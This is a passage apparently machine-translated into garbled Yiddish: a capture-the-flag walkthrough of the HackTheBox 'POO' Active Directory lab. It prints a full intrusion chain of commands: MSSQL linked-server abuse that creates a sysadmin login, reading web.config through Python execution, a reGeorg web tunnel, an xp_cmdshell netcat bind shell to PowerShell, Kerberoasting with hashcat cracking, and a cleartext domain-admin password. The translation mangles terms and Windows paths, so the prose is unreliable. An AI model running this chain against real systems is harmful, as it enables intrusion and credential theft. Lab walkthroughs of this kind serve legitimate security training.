HackTheBoxendgame. דורכפאָר פון דער לאַבאָראַטאָריע פאַכמאַן אַפענסיוו אָפּעראַטיאָנס. Pentest Active Directory

אין דעם אַרטיקל מיר וועלן פונאַנדערקלייַבן די דורכפאָר פון ניט בלויז אַ מאַשין, אָבער אַ גאַנץ מיני-לאַבאָראַטאָריע פון ​​דעם פּלאַץ HackTheBox.

ווי סטייטיד אין די באַשרייַבונג, POO איז דיזיינד צו פּרובירן סקילז אין אַלע סטאַגעס פון אנפאלן אין אַ קליין אַקטיוו Directory סוויווע. דער ציל איז צו קאָמפּראָמיס אַ צוטריטלעך באַלעבאָס, עסקאַלייט פּריווילאַדזשאַז און לעסאָף קאָמפּראָמיס די גאנצע פעלד בשעת קאַלעקטינג 5 פלאַגס.

פֿאַרבינדונג צו דער לאַבאָראַטאָריע איז דורך וופּן. עס איז רעקאַמענדיד נישט צו פאַרבינדן פֿון אַ אַרבעט קאָמפּיוטער אָדער פֿון אַ באַלעבאָס ווו עס זענען וויכטיק דאַטן פֿאַר איר, ווייַל איר ענדיקן זיך אויף אַ פּריוואַט נעץ מיט מענטשן וואָס וויסן עפּעס אין די פעלד פון אינפֿאָרמאַציע זיכערהייט :)

אָרגאַנאַזיישאַנאַל אינפֿאָרמאַציע
צו העלפן איר בלייבן דערהייַנטיקט מיט נייַע אַרטיקלען, ווייכווארג און אנדערע אינפֿאָרמאַציע, איך האָבן באשאפן טעלעגראַם קאַנאַל и גרופּע צו דיסקוטירן קיין ישוז אין די פעלד פון I&KB. אויך דיין פערזענלעכע ריקוועס, פֿראגן, פֿירלייגן און רעקאַמאַנדיישאַנז איך וועל פּערסנאַלי קוקן אין עס און ענטפֿערן צו אַלעמען..

כל אינפֿאָרמאַציע איז דערלאנגט בלויז פֿאַר בילדונגקרייז צוועקן. דער מחבר פון דעם דאָקומענט טוט נישט אָננעמען קיין פֿאַראַנטוואָרטלעכקייט פֿאַר קיין שעדיקן געפֿירט צו ווער עס יז ווי אַ רעזולטאַט פון די נוצן פון וויסן און טעקניקס באקומען פון לערנען דעם דאָקומענט.

ינטראָ

דער סוף שפּיל באשטייט פון צוויי מאשינען, און כּולל 5 פלאַגס.

א באַשרייַבונג און אַדרעס פון די בנימצא באַלעבאָס איז אויך געגעבן.

זאל ס באַקומען סטאַרטעד!

רעקאָן פאָן

דער מאַשין האט אַן IP אַדרעס פון 10.13.38.11, וואָס איך לייגן צו /etc/hosts.
10.13.38.11 poo.htb

ערשטער פון אַלע, מיר יבערקוקן עפענען פּאָרץ. זינט סקאַנינג אַלע פּאָרץ מיט nmap נעמט אַ לאַנג צייַט, איך וועל ערשטער טאָן דאָס מיט מאַססקאַן. מיר יבערקוקן אַלע TCP און UDP פּאָרץ פֿון די tun0 צובינד מיט אַ גיכקייַט פון 500 פּאַקיץ פּער סעקונדע.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

איצט, צו באַקומען מער דיטיילד אינפֿאָרמאַציע וועגן די סערוויסעס וואָס לויפן אויף די פּאָרץ, לאָזן אונדז יבערקוקן מיט די -A אָפּציע.

nmap -A poo.htb -p80,1433

אַזוי מיר האָבן IIS און MSSQL באַדינונגס. אין דעם פאַל, מיר וועלן געפֿינען די פאַקטיש דנס נאָמען פון די פעלד און קאָמפּיוטער. אויף די וועב סערווער מיר זענען באַגריסן דורך די IIS היים בלאַט.

זאל ס גיין דורך די דירעקטעריז. איך נוצן גאָבוסטער פֿאַר דעם. אין די פּאַראַמעטערס מיר אָנווייַזן די נומער פון פֿעדעם 128 (-ט), URL (-ו), ווערטערבוך (-וו) און יקסטענשאַנז וואָס אינטערעס אונדז (-רענטגענ).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

דאָס גיט אונדז הטטפּ אָטענטאַקיישאַן פֿאַר די / אַדמין וועגווייַזער, ווי געזונט ווי אַ צוטריטלעך דעסקטאַפּ דינסט .DS_Store טעקע. .DS_Store זענען טעקעס וואָס קראָם מנהג סעטטינגס פֿאַר אַ טעקע, אַזאַ ווי אַ רשימה פון טעקעס, ייקאַן לאָוקיישאַנז און די אויסגעקליבן הינטערגרונט בילד. אַזאַ אַ טעקע קען סוף אַרויף אין די וועב סערווער וועגווייַזער פון וועב דעוועלאָפּערס. אין דעם וועג מיר באַקומען אינפֿאָרמאַציע וועגן די אינהאַלט פון די וועגווייַזער. פֿאַר דעם איר קענען נוצן DS_Store קריכער.

python3 dsstore_crawler.py -i http://poo.htb/

מיר באַקומען די אינהאַלט פון די וועגווייַזער. די מערסט טשיקאַווע זאַך דאָ איז די / dev וועגווייַזער, פֿון וואָס מיר קענען קוקן אין די קוואלן און דב טעקעס אין צוויי צווייגן. אָבער מיר קענען נוצן די ערשטער 6 אותיות פון טעקע און וועגווייַזער נעמען אויב די סערוויס איז שפּירעוודיק צו IIS ShortName. איר קענען קאָנטראָלירן פֿאַר דעם וואַלנעראַביליטי ניצן IIS קורץ נאָמען סקאַננער.

און מיר געפֿינען איין טעקסט טעקע וואָס סטאַרץ מיט "פּאָאָ_קאָ". ניט געוואוסט וואָס צו טאָן ווייַטער, איך פשוט אויסגעקליבן אַלע די ווערטער סטאַרטינג מיט "קאָ" פון די וועגווייַזער ווערטערבוך.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

און מיר וועלן סאָרט עס אויס מיט wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

און מיר געפֿינען די רעכט וואָרט! מיר קוקן אין דעם טעקע, ראַטעווען די קראַדענטשאַלז (לויט די DBNAME פּאַראַמעטער, זיי זענען פֿון MSSQL).

מיר אַרויסגעבן די פאָן און מיר שטייַגן 20%.

הא פאָן

מיר פאַרבינדן צו MSSQL, איך נוצן DBeaver.

מיר טאָן ניט געפֿינען עפּעס טשיקאַווע אין דעם דאַטאַבייס, לאָזן אונדז שאַפֿן אַ סקל עדיטאָר און קאָנטראָלירן וואָס ניצערס עס זענען.

SELECT name FROM master..syslogins;

מיר האָבן צוויי ניצערס. לאָמיר קאָנטראָלירן אונדזער פּריווילאַדזשאַז.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

אזוי, עס זענען קיין פּריווילאַדזשאַז. זאל ס קוק אין לינגקט סערווערס, איך געשריבן וועגן דעם טעכניק אין דעטאַל דאָ.

SELECT * FROM master..sysservers;

דאָס איז ווי מיר געפֿינען אן אנדער SQL סערווירער. לאָמיר פּרובירן די דורכפירונג פון קאַמאַנדז אויף דעם סערווער ניצן אָפּענקווערי ().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

און מיר קענען אפילו בויען אַ אָנפֿרעג בוים.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

די פונט איז אַז ווען מיר מאַכן אַ בקשה צו אַ לינגקט סערווער, די בעטן איז עקסאַקיוטאַד אין דעם קאָנטעקסט פון אן אנדער באַניצער! לאָמיר זען אין דעם קאָנטעקסט פון וואָס באַניצער מיר אַרבעטן אויף אַ לינגקט סערווער.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

איצט לאָמיר זען אין וואָס קאָנטעקסט אַ בקשה איז געמאכט פון אַ לינגקט סערווער צו אונדזער!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

אַזוי עס איז די DBO קאָנטעקסט וואָס זאָל האָבן אַלע די פּריווילאַדזשאַז. לאָמיר קאָנטראָלירן די פּריווילאַדזשאַז אין פאַל פון אַ בקשה פון אַ לינגקט סערווער.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

ווי איר קענען זען, מיר האָבן אַלע די פּריווילאַדזשאַז! לאָמיר מאַכן אונדזער אייגענע אַדמיניסטראַטאָר ווי דאָס. אָבער זיי טאָן ניט לאָזן עס דורך אָפּענקווערי, לאָזן אונדז טאָן דאָס דורך EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

און איצט מיר פאַרבינדן מיט די קראַדענטשאַלז פון די נייַע באַניצער, מיר אָבסערווירן די נייַע פאָן דאַטאַבייס.

מיר געבן איבער דעם פאָן און גיין אויף.

באַקטראַקק פאָן

לאָמיר באַקומען אַ שאָל ניצן MSSQL, איך נוצן mssqlclient פֿון די ימפּאַקט פּעקל.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

מיר דאַרפֿן צו באַקומען פּאַסווערדז, און דער ערשטער זאַך מיר האָבן שוין געפּלאָנטערט איז אַ וועבזייטל. אזוי, מיר דאַרפֿן אַ וועב סערווער קאַנפיגיעריישאַן (עס איז ניט מעגלעך צו לאָזן אַ באַקוועם שאָל, משמעות די פיירוואַל איז פליסנדיק).

אבער צוטריט איז געלייקנט. כאָטש מיר קענען לייענען די טעקע פֿון MSSQL, מיר נאָר דאַרפֿן צו וויסן וואָס פּראָגראַממינג שפּראַכן זענען קאַנפיגיערד. און אין די MSSQL וועגווייַזער מיר געפֿינען אַז עס איז פּיטהאָן.

דערנאָך עס איז קיין פּראָבלעם צו לייענען די וועב.קאָנפיג טעקע.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

מיט די געפֿונען קראַדענטשאַלז, גיין צו / אַדמין און נעמען די פאָן.

פאָאָטהאָלד פאָן

אין פאַקט, עס זענען עטלעכע ינקאַנוויניאַנסיז פון ניצן אַ פיירוואַל, אָבער איר זוכט דורך די נעץ סעטטינגס, מיר באַמערקן אַז IPv6 איז אויך געניצט!

לאָמיר לייגן דעם אַדרעס צו /etc/hosts.
dead:babe::1001 poo6.htb
לאָמיר יבערקוקן דעם באַלעבאָס ווידער, אָבער ניצן די IPv6 פּראָטאָקאָל.

און די WinRM סערוויס איז בארעכטיגט איבער IPv6. זאל ס פאַרבינדן מיט די געפֿונען קראַדענטשאַלז.

עס איז אַ פאָן אויף די דעסקטאַפּ, מיר געבן עס איבער.

פּ00נעד פאָן

נאָך קאַנדאַקטינג ריקאַנאַסאַנס אויף דער באַלעבאָס ניצן ווינפּעאַס מיר געפֿינען ניט עפּעס ספּעציעל. דערנאָך עס איז באַשלאָסן צו קוקן פֿאַר קראַדענטשאַלז ווידער (איך אויך געשריבן אויף דעם טעמע אַרטיקל). אָבער איך קען נישט באַקומען אַלע די SPNs פֿון די סיסטעם דורך WinRM.

setspn.exe -T intranet.poo -Q */*

לאָמיר לויפן די באַפֿעל דורך MSSQL.

מיט דעם אופֿן, מיר באַקומען די SPN פון ניצערס p00_hr און p00_adm, וואָס מיטל אַז זיי זענען שפּירעוודיק צו אַ באַפאַלן אַזאַ ווי Kerberoasting. אין קורץ, מיר קענען באַקומען זייער פּאַראָל האַשעס.

ערשטער איר דאַרפֿן צו באַקומען אַ סטאַביל שאָל ווי אַ MSSQL באַניצער. אָבער זינט מיר זענען לימיטעד אין אַקסעס, מיר האָבן קאָמוניקאַציע מיט דער באַלעבאָס בלויז דורך פּאָרץ 80 און 1433. אָבער עס איז מעגלעך צו טונעל פאַרקער דורך פּאָרט 80! פֿאַר דעם מיר וועלן נוצן די פאלגענדע אַפּלאַקיישאַן. לאָמיר צופֿעליקער די טעקע tunnel.aspx צו די היים וועגווייַזער פון די וועב סערווער - C: inetpubwwwroot.

אבער ווען מיר פּרובירן צו אַקסעס עס, מיר באַקומען אַ טעות 404. דעם מיטל אַז *.אַספּקס טעקעס זענען נישט עקסאַקיוטאַד. כּדי טעקעס מיט די יקסטענשאַנז זאָל זיין עקסאַקיוטאַד, ינסטאַלירן ASP.NET 4.5 ווי גייט.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

און איצט, ווען מיר אַקסעס tunnel.aspx, מיר באַקומען אַ ענטפער אַז אַלץ איז גרייט צו גיין.

לאָמיר קאַטער דעם קליענט טייל פון די אַפּלאַקיישאַן, וואָס וועט רעלע פאַרקער. מיר וועלן פאָרויס אַלע פאַרקער פון פּאָרט 5432 צו די סערווער.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

און מיר נוצן פּראַקסיטשאַינס צו שיקן פאַרקער פון קיין אַפּלאַקיישאַן דורך אונדזער פּראַקסי. לאָמיר לייגן דעם פראקסי צו די קאַנפיגיעריישאַן טעקע /etc/proxychains.conf.

איצט לאָזן ס צופֿעליקער די פּראָגראַם צו די סערווער נעטקאַט, מיט וואָס מיר וועלן מאַכן אַ סטאַביל בינדן שאָל און שריפט אָנרופן-קערבעראָאַסט, מי ט װעלכע ר מי ר װעל ן דורכפיר ן א קערבערואסטינג־אטאק .

איצט מיר קאַטער די ליסנער דורך MSSQL.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

און מיר פאַרבינדן דורך אונדזער פּראַקסי.

proxychains rlwrap nc poo.htb 4321

און לאָמיר נעמען די כאַשיז.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

ווייַטער איר דאַרפֿן צו יטערייט איבער די האַשעס. זינט די Rockyou ווערטערבוך האט נישט אַנטהאַלטן די פּאַסווערדז, איך געוויינט אַלע די פּאַסווערדז דיקשאַנעריז צוגעשטעלט אין Seclists. פֿאַר די זוכן מיר נוצן hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

און מיר געפֿינען ביידע פּאַסווערדז, דער ערשטער אין די ווערטערבוך dutch_passwordlist.txt, און די רגע אין Keyboard-Combinations.txt.

און אַזוי מיר האָבן דריי יוזערז, לאָזן אונדז גיין צו די פעלד קאַנטראָולער. ערשטער מיר געפֿינען אויס זיין אַדרעס.

גרויס, מיר געפֿונען די IP אַדרעס פון די פעלד קאַנטראָולער. לאָמיר געפֿינען אַלע די ניצערס פון די פעלד, און וואָס פון זיי איז אַ אַדמיניסטראַטאָר. צו אָפּלאָדירן די שריפט צו באַקומען אינפֿאָרמאַציע PowerView.ps1. דערנאָך מיר וועלן פאַרבינדן מיט Evil-winrm, ספּעציפיצירן די וועגווייַזער מיט די שריפט אין די -s פּאַראַמעטער. און דעמאָלט מיר נאָר לאָדן די PowerView שריפט.

איצט מיר האָבן צוטריט צו אַלע זייַן פאַנגקשאַנז. דער p00_adm באַניצער קוקט ווי אַ פּריוולידזשד באַניצער, אַזוי מיר וועלן אַרבעטן אין זיין קאָנטעקסט. לאָמיר מאַכן אַ PSCredential כייפעץ פֿאַר דעם באַניצער.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

איצט אַלע פּאָווערשעלל קאַמאַנדז ווו מיר ספּעציפיצירן קרעדס וועט זיין עקסאַקיוטאַד ווי p00_adm. לאָזן אונדז ווייַזן אַ רשימה פון יוזערז און די אַטריביוט פון AdminCount.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

און אַזוי, אונדזער באַניצער איז טאַקע זוכה. לאָמיר זען אין וואָס גרופּעס ער איז.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

מיר לעסאָף באַשטעטיקן אַז דער באַניצער איז אַ פעלד אַדמיניסטראַטאָר. דאָס גיט אים די רעכט צו רימאָוטלי קלאָץ אויף צו די פעלד קאַנטראָולער. זאל ס פּרובירן לאָגינג אין דורך WinRM ניצן אונדזער טונעל. איך איז געווען צעמישט דורך די ערראָרס געשאפן דורך reGeorg ווען איך נוצן evil-winrm.

דערנאָך לאָזן אונדז נוצן אנדערן, גרינגער איינער, שריפט צו פאַרבינדן צו WinRM. זאל ס עפענען און טוישן די קשר פּאַראַמעטערס.

מיר פּרובירן צו פאַרבינדן, און מיר זענען אין די סיסטעם.

אבער עס איז קיין פאָן. דערנאָך קוק די באַניצער און קאָנטראָלירן די דעסקטאַפּס.

מיר געפֿינען די פאָן ביי mr3ks און די לאַבאָראַטאָריע איז 100% געענדיקט.

אַז ס אַלע. ווי אַ באַמערקונגען, ביטע באַמערקונג צי איר געלערנט עפּעס נייַ פון דעם אַרטיקל און צי עס איז נוציק פֿאַר איר.

איר קענען פאַרבינדן אונדז אין טעלעגראַם. דאָרט איר קענען געפֿינען טשיקאַווע מאַטעריאַלס, ליקט קאָרסאַז, ווי געזונט ווי ווייכווארג. לאָמיר קלייַבן אַ קהל אין וואָס עס וועט זיין מענטשן וואָס פֿאַרשטיין פילע געביטן פון IT, און מיר קענען שטענדיק העלפֿן יעדער אנדערע אין קיין IT און אינפֿאָרמאַציע זיכערהייט ישוז.

מקור: www.habr.com